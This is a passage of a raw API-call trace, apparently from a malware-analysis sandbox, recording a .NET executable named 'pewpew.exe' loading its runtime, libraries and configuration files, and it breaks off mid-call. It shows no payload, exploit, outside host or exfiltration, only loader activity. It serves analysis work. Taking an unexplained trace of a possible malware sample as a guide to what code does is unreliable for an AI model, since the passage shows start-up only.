(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0079.386] GetLastError () returned 0x0 [0079.386] SysReAllocStringLen (in: pbstr=0x6eea70*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", len=0x30 | out: pbstr=0x6eea70*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe") returned 1 [0079.386] GetThreadLocale () returned 0x409 [0079.386] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0079.386] GetThreadLocale () returned 0x409 [0079.386] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0079.386] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", nBufferLength=0x104, lpBuffer=0x6ee7f4, lpFilePart=0x6ee7f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", lpFilePart=0x6ee7f0*="pewpew.exe") returned 0x30 [0079.386] SysReAllocStringLen (in: pbstr=0x6eea70*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", len=0x30 | out: pbstr=0x6eea70*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe") returned 1 [0079.386] SysReAllocStringLen (in: pbstr=0x6eea20*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", len=0x30 | out: pbstr=0x6eea20*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe") returned 1 [0079.386] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", cchLength=0x30 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe") returned 0x30 [0079.386] SysReAllocStringLen (in: pbstr=0x6eea70*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe", len=0x30 | out: pbstr=0x6eea70*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe") returned 1 [0079.386] GetCurrentThreadId () returned 0xb0c [0079.386] ResetEvent (hEvent=0xb8) returned 1 [0079.386] GetCurrentThreadId () returned 0xb0c [0079.387] GetCurrentThreadId () returned 0xb0c [0079.387] GetCurrentThreadId () returned 0xb0c [0079.387] GetCurrentThreadId () returned 0xb0c [0079.387] ResetEvent (hEvent=0xb8) returned 1 [0079.387] GetCurrentThreadId () returned 0xb0c [0079.387] GetCurrentThreadId () returned 0xb0c [0079.387] SetEvent (hEvent=0xbc) returned 1 [0079.387] SetEvent (hEvent=0xb8) returned 1 [0079.387] SetLastError (dwErrCode=0x0) [0079.387] GetCurrentThreadId () returned 0xb0c [0079.387] ResetEvent (hEvent=0xb8) returned 1 [0079.388] GetCurrentThreadId () returned 0xb0c [0079.388] GetCurrentThreadId () returned 0xb0c [0079.388] GetCurrentThreadId () returned 0xb0c [0079.388] GetCurrentThreadId () returned 0xb0c [0079.388] ResetEvent (hEvent=0xb8) returned 1 [0079.388] GetCurrentThreadId () returned 0xb0c [0079.388] GetCurrentThreadId () returned 0xb0c [0079.388] SetEvent (hEvent=0xbc) returned 1 [0079.388] SetEvent (hEvent=0xb8) returned 1 [0079.388] CloseHandle (hObject=0x1fc) returned 1 [0079.419] SysReAllocStringLen (in: pbstr=0x6eebf8*=0x0, psz="ole32.dll", len=0x9 | out: pbstr=0x6eebf8*="ole32.dll") returned 1 [0079.419] CharLowerBuffW (in: lpsz="ole32.dll", cchLength=0x9 | out: lpsz="ole32.dll") returned 0x9 [0079.419] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll", hFile=0x0, dwFlags=0x8) returned 0x0 [0079.420] GetLastError () returned 0x7e [0079.420] SetLastError (dwErrCode=0x7e) [0079.420] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ad4, cbMultiByte=9, lpWideCharStr=0x6ee0d4, cchWideChar=2047 | out: lpWideCharStr="ole32.dll") returned 9 [0079.420] SysReAllocStringLen (in: pbstr=0x6ef0d8*=0x0, psz="ole32.dll", len=0x9 | out: pbstr=0x6ef0d8*="ole32.dll") returned 1 [0079.421] CharLowerBuffW (in: lpsz="ole32.dll", cchLength=0x9 | out: lpsz="ole32.dll") returned 0x9 [0079.421] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76620000 [0079.421] GetLastError () returned 0x0 [0079.421] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef0c4*=0x766214a0, NumberOfBytesToProtect=0x6ef0c8, NewAccessProtection=0x4, OldAccessProtection=0x6ef0fc | out: BaseAddress=0x6ef0c4*=0x76621000, NumberOfBytesToProtect=0x6ef0c8, OldAccessProtection=0x6ef0fc*=0x20) returned 0x0 [0079.422] GetCurrentProcess () returned 0xffffffff [0079.422] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef0c4*=0x766214a0, NumberOfBytesToProtect=0x6ef0c8, NewAccessProtection=0x20, OldAccessProtection=0x6ef0fc | out: BaseAddress=0x6ef0c4*=0x76621000, NumberOfBytesToProtect=0x6ef0c8, OldAccessProtection=0x6ef0fc*=0x4) returned 0x0 [0079.422] GetCurrentProcess () returned 0xffffffff [0079.422] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef0c4*=0x766214b0, NumberOfBytesToProtect=0x6ef0c8, NewAccessProtection=0x4, OldAccessProtection=0x6ef0fc | out: BaseAddress=0x6ef0c4*=0x76621000, NumberOfBytesToProtect=0x6ef0c8, OldAccessProtection=0x6ef0fc*=0x20) returned 0x0 [0079.422] GetCurrentProcess () returned 0xffffffff [0079.422] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef0c4*=0x766214b0, NumberOfBytesToProtect=0x6ef0c8, NewAccessProtection=0x20, OldAccessProtection=0x6ef0fc | out: BaseAddress=0x6ef0c4*=0x76621000, NumberOfBytesToProtect=0x6ef0c8, OldAccessProtection=0x6ef0fc*=0x4) returned 0x0 [0079.422] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef0c4*=0x766219a8, NumberOfBytesToProtect=0x6ef0c8, NewAccessProtection=0x4, OldAccessProtection=0x6ef0fc | out: BaseAddress=0x6ef0c4*=0x76621000, NumberOfBytesToProtect=0x6ef0c8, OldAccessProtection=0x6ef0fc*=0x20) returned 0x0 [0079.423] GetCurrentProcess () returned 0xffffffff [0079.423] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef0c4*=0x766219a8, NumberOfBytesToProtect=0x6ef0c8, NewAccessProtection=0x20, OldAccessProtection=0x6ef0fc | out: BaseAddress=0x6ef0c4*=0x76621000, NumberOfBytesToProtect=0x6ef0c8, OldAccessProtection=0x6ef0fc*=0x4) returned 0x0 [0079.423] GetCurrentProcess () returned 0xffffffff [0079.423] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef0c4*=0x766219ac, NumberOfBytesToProtect=0x6ef0c8, NewAccessProtection=0x4, OldAccessProtection=0x6ef0fc | out: BaseAddress=0x6ef0c4*=0x76621000, NumberOfBytesToProtect=0x6ef0c8, OldAccessProtection=0x6ef0fc*=0x20) returned 0x0 [0079.423] GetCurrentProcess () returned 0xffffffff [0079.423] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef0c4*=0x766219ac, NumberOfBytesToProtect=0x6ef0c8, NewAccessProtection=0x20, OldAccessProtection=0x6ef0fc | out: BaseAddress=0x6ef0c4*=0x76621000, NumberOfBytesToProtect=0x6ef0c8, OldAccessProtection=0x6ef0fc*=0x4) returned 0x0 [0079.424] GetCurrentProcess () returned 0xffffffff [0079.424] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef0c4*=0x76621a00, NumberOfBytesToProtect=0x6ef0c8, NewAccessProtection=0x4, OldAccessProtection=0x6ef0fc | out: BaseAddress=0x6ef0c4*=0x76621000, NumberOfBytesToProtect=0x6ef0c8, OldAccessProtection=0x6ef0fc*=0x20) returned 0x0 [0079.424] GetCurrentProcess () returned 0xffffffff [0079.424] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef0c4*=0x76621a00, NumberOfBytesToProtect=0x6ef0c8, NewAccessProtection=0x20, OldAccessProtection=0x6ef0fc | out: BaseAddress=0x6ef0c4*=0x76621000, NumberOfBytesToProtect=0x6ef0c8, OldAccessProtection=0x6ef0fc*=0x4) returned 0x0 [0079.424] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0079.521] SysReAllocStringLen (in: pbstr=0x6ee544*=0x0, psz="clrjit.dll", len=0xa | out: pbstr=0x6ee544*="clrjit.dll") returned 1 [0079.521] CharLowerBuffW (in: lpsz="clrjit.dll", cchLength=0xa | out: lpsz="clrjit.dll") returned 0xa [0079.521] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll", hFile=0x0, dwFlags=0x8) returned 0x75370000 [0079.665] GetLastError () returned 0x7e [0079.665] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee52c*=0x753de00c, NumberOfBytesToProtect=0x6ee530, NewAccessProtection=0x4, OldAccessProtection=0x6ee564 | out: BaseAddress=0x6ee52c*=0x753de000, NumberOfBytesToProtect=0x6ee530, OldAccessProtection=0x6ee564*=0x2) returned 0x0 [0079.665] GetCurrentProcess () returned 0xffffffff [0079.665] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee52c*=0x753de00c, NumberOfBytesToProtect=0x6ee530, NewAccessProtection=0x2, OldAccessProtection=0x6ee564 | out: BaseAddress=0x6ee52c*=0x753de000, NumberOfBytesToProtect=0x6ee530, OldAccessProtection=0x6ee564*=0x4) returned 0x0 [0079.665] GetCurrentProcess () returned 0xffffffff [0079.665] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee52c*=0x753de050, NumberOfBytesToProtect=0x6ee530, NewAccessProtection=0x4, OldAccessProtection=0x6ee564 | out: BaseAddress=0x6ee52c*=0x753de000, NumberOfBytesToProtect=0x6ee530, OldAccessProtection=0x6ee564*=0x2) returned 0x0 [0079.666] GetCurrentProcess () returned 0xffffffff [0079.666] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee52c*=0x753de050, NumberOfBytesToProtect=0x6ee530, NewAccessProtection=0x2, OldAccessProtection=0x6ee564 | out: BaseAddress=0x6ee52c*=0x753de000, NumberOfBytesToProtect=0x6ee530, OldAccessProtection=0x6ee564*=0x4) returned 0x0 [0079.666] GetCurrentProcess () returned 0xffffffff [0079.666] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee52c*=0x753de054, NumberOfBytesToProtect=0x6ee530, NewAccessProtection=0x4, OldAccessProtection=0x6ee564 | out: BaseAddress=0x6ee52c*=0x753de000, NumberOfBytesToProtect=0x6ee530, OldAccessProtection=0x6ee564*=0x2) returned 0x0 [0079.666] GetCurrentProcess () returned 0xffffffff [0079.666] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee52c*=0x753de054, NumberOfBytesToProtect=0x6ee530, NewAccessProtection=0x2, OldAccessProtection=0x6ee564 | out: BaseAddress=0x6ee52c*=0x753de000, NumberOfBytesToProtect=0x6ee530, OldAccessProtection=0x6ee564*=0x4) returned 0x0 [0079.667] GetProcAddress (hModule=0x75370000, lpProcName="getJit") returned 0x753bf70e [0079.714] SysReAllocStringLen (in: pbstr=0x6ec178*=0x0, psz="advapi32.dll", len=0xc | out: pbstr=0x6ec178*="advapi32.dll") returned 1 [0079.714] CharLowerBuffW (in: lpsz="advapi32.dll", cchLength=0xc | out: lpsz="advapi32.dll") returned 0xc [0079.714] LoadLibraryExW (lpLibFileName="advapi32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0079.714] GetLastError () returned 0x0 [0079.715] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec160*=0x77711520, NumberOfBytesToProtect=0x6ec164, NewAccessProtection=0x4, OldAccessProtection=0x6ec198 | out: BaseAddress=0x6ec160*=0x77711000, NumberOfBytesToProtect=0x6ec164, OldAccessProtection=0x6ec198*=0x20) returned 0x0 [0079.715] GetCurrentProcess () returned 0xffffffff [0079.715] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec160*=0x77711520, NumberOfBytesToProtect=0x6ec164, NewAccessProtection=0x20, OldAccessProtection=0x6ec198 | out: BaseAddress=0x6ec160*=0x77711000, NumberOfBytesToProtect=0x6ec164, OldAccessProtection=0x6ec198*=0x4) returned 0x0 [0079.715] GetCurrentProcess () returned 0xffffffff [0079.715] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec160*=0x77711540, NumberOfBytesToProtect=0x6ec164, NewAccessProtection=0x4, OldAccessProtection=0x6ec198 | out: BaseAddress=0x6ec160*=0x77711000, NumberOfBytesToProtect=0x6ec164, OldAccessProtection=0x6ec198*=0x20) returned 0x0 [0079.715] GetCurrentProcess () returned 0xffffffff [0079.715] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec160*=0x77711540, NumberOfBytesToProtect=0x6ec164, NewAccessProtection=0x20, OldAccessProtection=0x6ec198 | out: BaseAddress=0x6ec160*=0x77711000, NumberOfBytesToProtect=0x6ec164, OldAccessProtection=0x6ec198*=0x4) returned 0x0 [0079.715] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec160*=0x7771175c, NumberOfBytesToProtect=0x6ec164, NewAccessProtection=0x4, OldAccessProtection=0x6ec198 | out: BaseAddress=0x6ec160*=0x77711000, NumberOfBytesToProtect=0x6ec164, OldAccessProtection=0x6ec198*=0x20) returned 0x0 [0079.716] GetCurrentProcess () returned 0xffffffff [0079.716] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec160*=0x7771175c, NumberOfBytesToProtect=0x6ec164, NewAccessProtection=0x20, OldAccessProtection=0x6ec198 | out: BaseAddress=0x6ec160*=0x77711000, NumberOfBytesToProtect=0x6ec164, OldAccessProtection=0x6ec198*=0x4) returned 0x0 [0079.716] GetCurrentProcess () returned 0xffffffff [0079.716] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec160*=0x77711768, NumberOfBytesToProtect=0x6ec164, NewAccessProtection=0x4, OldAccessProtection=0x6ec198 | out: BaseAddress=0x6ec160*=0x77711000, NumberOfBytesToProtect=0x6ec164, OldAccessProtection=0x6ec198*=0x20) returned 0x0 [0079.716] GetCurrentProcess () returned 0xffffffff [0079.716] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec160*=0x77711768, NumberOfBytesToProtect=0x6ec164, NewAccessProtection=0x20, OldAccessProtection=0x6ec198 | out: BaseAddress=0x6ec160*=0x77711000, NumberOfBytesToProtect=0x6ec164, OldAccessProtection=0x6ec198*=0x4) returned 0x0 [0079.716] GetCurrentProcess () returned 0xffffffff [0079.716] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec160*=0x777117b8, NumberOfBytesToProtect=0x6ec164, NewAccessProtection=0x4, OldAccessProtection=0x6ec198 | out: BaseAddress=0x6ec160*=0x77711000, NumberOfBytesToProtect=0x6ec164, OldAccessProtection=0x6ec198*=0x20) returned 0x0 [0079.716] GetCurrentProcess () returned 0xffffffff [0079.717] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec160*=0x777117b8, NumberOfBytesToProtect=0x6ec164, NewAccessProtection=0x20, OldAccessProtection=0x6ec198 | out: BaseAddress=0x6ec160*=0x77711000, NumberOfBytesToProtect=0x6ec164, OldAccessProtection=0x6ec198*=0x4) returned 0x0 [0079.717] GetCurrentProcess () returned 0xffffffff [0079.717] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec160*=0x777117bc, NumberOfBytesToProtect=0x6ec164, NewAccessProtection=0x4, OldAccessProtection=0x6ec198 | out: BaseAddress=0x6ec160*=0x77711000, NumberOfBytesToProtect=0x6ec164, OldAccessProtection=0x6ec198*=0x20) returned 0x0 [0079.717] GetCurrentProcess () returned 0xffffffff [0079.717] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec160*=0x777117bc, NumberOfBytesToProtect=0x6ec164, NewAccessProtection=0x20, OldAccessProtection=0x6ec198 | out: BaseAddress=0x6ec160*=0x77711000, NumberOfBytesToProtect=0x6ec164, OldAccessProtection=0x6ec198*=0x4) returned 0x0 [0079.717] GetCurrentProcess () returned 0xffffffff [0079.717] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec160*=0x777117c8, NumberOfBytesToProtect=0x6ec164, NewAccessProtection=0x4, OldAccessProtection=0x6ec198 | out: BaseAddress=0x6ec160*=0x77711000, NumberOfBytesToProtect=0x6ec164, OldAccessProtection=0x6ec198*=0x20) returned 0x0 [0079.717] GetCurrentProcess () returned 0xffffffff [0079.717] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec160*=0x777117c8, NumberOfBytesToProtect=0x6ec164, NewAccessProtection=0x20, OldAccessProtection=0x6ec198 | out: BaseAddress=0x6ec160*=0x77711000, NumberOfBytesToProtect=0x6ec164, OldAccessProtection=0x6ec198*=0x4) returned 0x0 [0079.717] GetCurrentProcess () returned 0xffffffff [0079.717] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec160*=0x777117d0, NumberOfBytesToProtect=0x6ec164, NewAccessProtection=0x4, OldAccessProtection=0x6ec198 | out: BaseAddress=0x6ec160*=0x77711000, NumberOfBytesToProtect=0x6ec164, OldAccessProtection=0x6ec198*=0x20) returned 0x0 [0079.718] GetCurrentProcess () returned 0xffffffff [0079.718] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec160*=0x777117d0, NumberOfBytesToProtect=0x6ec164, NewAccessProtection=0x20, OldAccessProtection=0x6ec198 | out: BaseAddress=0x6ec160*=0x77711000, NumberOfBytesToProtect=0x6ec164, OldAccessProtection=0x6ec198*=0x4) returned 0x0 [0079.718] GetCurrentProcess () returned 0xffffffff [0079.718] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec160*=0x7771180c, NumberOfBytesToProtect=0x6ec164, NewAccessProtection=0x4, OldAccessProtection=0x6ec198 | out: BaseAddress=0x6ec160*=0x77711000, NumberOfBytesToProtect=0x6ec164, OldAccessProtection=0x6ec198*=0x20) returned 0x0 [0079.718] GetCurrentProcess () returned 0xffffffff [0079.718] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec160*=0x7771180c, NumberOfBytesToProtect=0x6ec164, NewAccessProtection=0x20, OldAccessProtection=0x6ec198 | out: BaseAddress=0x6ec160*=0x77711000, NumberOfBytesToProtect=0x6ec164, OldAccessProtection=0x6ec198*=0x4) returned 0x0 [0079.718] GetCurrentProcess () returned 0xffffffff [0079.718] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec160*=0x7771182c, NumberOfBytesToProtect=0x6ec164, NewAccessProtection=0x4, OldAccessProtection=0x6ec198 | out: BaseAddress=0x6ec160*=0x77711000, NumberOfBytesToProtect=0x6ec164, OldAccessProtection=0x6ec198*=0x20) returned 0x0 [0079.719] GetCurrentProcess () returned 0xffffffff [0079.719] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec160*=0x7771182c, NumberOfBytesToProtect=0x6ec164, NewAccessProtection=0x20, OldAccessProtection=0x6ec198 | out: BaseAddress=0x6ec160*=0x77711000, NumberOfBytesToProtect=0x6ec164, OldAccessProtection=0x6ec198*=0x4) returned 0x0 [0079.719] GetCurrentProcess () returned 0xffffffff [0079.719] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec160*=0x77711860, NumberOfBytesToProtect=0x6ec164, NewAccessProtection=0x4, OldAccessProtection=0x6ec198 | out: BaseAddress=0x6ec160*=0x77711000, NumberOfBytesToProtect=0x6ec164, OldAccessProtection=0x6ec198*=0x20) returned 0x0 [0079.719] GetCurrentProcess () returned 0xffffffff [0079.719] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec160*=0x77711860, NumberOfBytesToProtect=0x6ec164, NewAccessProtection=0x20, OldAccessProtection=0x6ec198 | out: BaseAddress=0x6ec160*=0x77711000, NumberOfBytesToProtect=0x6ec164, OldAccessProtection=0x6ec198*=0x4) returned 0x0 [0079.719] GetProcAddress (hModule=0x77710000, lpProcName="EventRegister") returned 0x77c7f6ba [0079.720] GetProcAddress (hModule=0x75620000, lpProcName="GetProcessExecutableHeap") returned 0x756289ec [0079.720] GetProcAddress (hModule=0x754f0000, lpProcName="GetProcessExecutableHeap_RetAddr") returned 0x0 [0079.720] GetProcAddress (hModule=0x754f0000, lpProcName="GetProcessExecutableHeap") returned 0x754f1ca5 [0079.723] EtwEventRegister () returned 0x0 [0079.732] SysReAllocStringLen (in: pbstr=0x6eca04*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x6eca04*="kernel32") returned 1 [0079.732] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0079.732] GetModuleHandleW (lpModuleName="kernel32") returned 0x76d30000 [0079.734] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0079.735] SysReAllocStringLen (in: pbstr=0x6eca04*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x6eca04*="kernel32") returned 1 [0079.735] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0079.735] GetModuleHandleW (lpModuleName="kernel32") returned 0x76d30000 [0079.737] GetProcAddress (hModule=0x76d30000, lpProcName="LocaleNameToLCID") returned 0x76dc4801 [0079.743] SysReAllocStringLen (in: pbstr=0x6ecd2c*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x6ecd2c*="kernel32") returned 1 [0079.743] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0079.743] GetModuleHandleW (lpModuleName="kernel32") returned 0x76d30000 [0079.745] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0079.746] SysReAllocStringLen (in: pbstr=0x6ecc54*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x6ecc54*="kernel32") returned 1 [0079.746] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0079.747] GetModuleHandleW (lpModuleName="kernel32") returned 0x76d30000 [0079.749] GetProcAddress (hModule=0x76d30000, lpProcName="LCIDToLocaleName") returned 0x76d6ced4 [0079.760] SysReAllocStringLen (in: pbstr=0x6ecd08*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x6ecd08*="kernel32") returned 1 [0079.760] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0079.760] GetModuleHandleW (lpModuleName="kernel32") returned 0x76d30000 [0079.763] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserPreferredUILanguages") returned 0x76dc47d1 [0079.770] SysReAllocStringLen (in: pbstr=0x6ed2b0*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x6ed2b0*="kernel32") returned 1 [0079.770] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0079.771] GetModuleHandleW (lpModuleName="kernel32") returned 0x76d30000 [0079.773] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringOrdinal") returned 0x76d60608 [0079.774] SysReAllocStringLen (in: pbstr=0x6ec240*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x6ec240*="kernel32.dll") returned 1 [0079.774] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0079.775] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0079.775] GetLastError () returned 0x0 [0079.777] GetProcAddress (hModule=0x76d30000, lpProcName="GetFullPathName") returned 0x0 [0079.780] GetProcAddress (hModule=0x76d30000, lpProcName="GetFullPathNameW") returned 0x76d440d4 [0079.780] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config", nBufferLength=0x105, lpBuffer=0x6ecebc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config", lpFilePart=0x0) returned 0x37 [0079.783] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0079.783] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ed350) returned 1 [0079.785] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesEx") returned 0x0 [0079.787] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesExW") returned 0x76d44574 [0079.788] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x6ed3cc | out: lpFileInformation=0x6ed3cc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0079.788] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ed34c) returned 1 [0079.794] CreateFileW (lpFileName="C:\\Windows\\assembly\\pubpol109.dat" (normalized: "c:\\windows\\assembly\\pubpol109.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0079.796] GetLastError () returned 0x0 [0079.796] SysReAllocStringLen (in: pbstr=0x6ea6c8*=0x0, psz="C:\\Windows\\assembly\\pubpol109.dat", len=0x21 | out: pbstr=0x6ea6c8*="C:\\Windows\\assembly\\pubpol109.dat") returned 1 [0079.796] GetThreadLocale () returned 0x409 [0079.796] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\pubpol109.dat", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0079.796] GetThreadLocale () returned 0x409 [0079.796] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\pubpol109.dat", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0079.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\pubpol109.dat", nBufferLength=0x104, lpBuffer=0x6ea44c, lpFilePart=0x6ea448 | out: lpBuffer="C:\\Windows\\assembly\\pubpol109.dat", lpFilePart=0x6ea448*="pubpol109.dat") returned 0x21 [0079.796] SysReAllocStringLen (in: pbstr=0x6ea6c8*="C:\\Windows\\assembly\\pubpol109.dat", psz="C:\\Windows\\assembly\\pubpol109.dat", len=0x21 | out: pbstr=0x6ea6c8*="C:\\Windows\\assembly\\pubpol109.dat") returned 1 [0079.796] SysReAllocStringLen (in: pbstr=0x6ea678*=0x0, psz="C:\\Windows\\assembly\\pubpol109.dat", len=0x21 | out: pbstr=0x6ea678*="C:\\Windows\\assembly\\pubpol109.dat") returned 1 [0079.796] CharLowerBuffW (in: lpsz="C:\\Windows\\assembly\\pubpol109.dat", cchLength=0x21 | out: lpsz="c:\\windows\\assembly\\pubpol109.dat") returned 0x21 [0079.796] SysReAllocStringLen (in: pbstr=0x6ea6c8*="C:\\Windows\\assembly\\pubpol109.dat", psz="c:\\windows\\assembly\\pubpol109.dat", len=0x21 | out: pbstr=0x6ea6c8*="c:\\windows\\assembly\\pubpol109.dat") returned 1 [0079.796] SetLastError (dwErrCode=0x0) [0079.800] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, 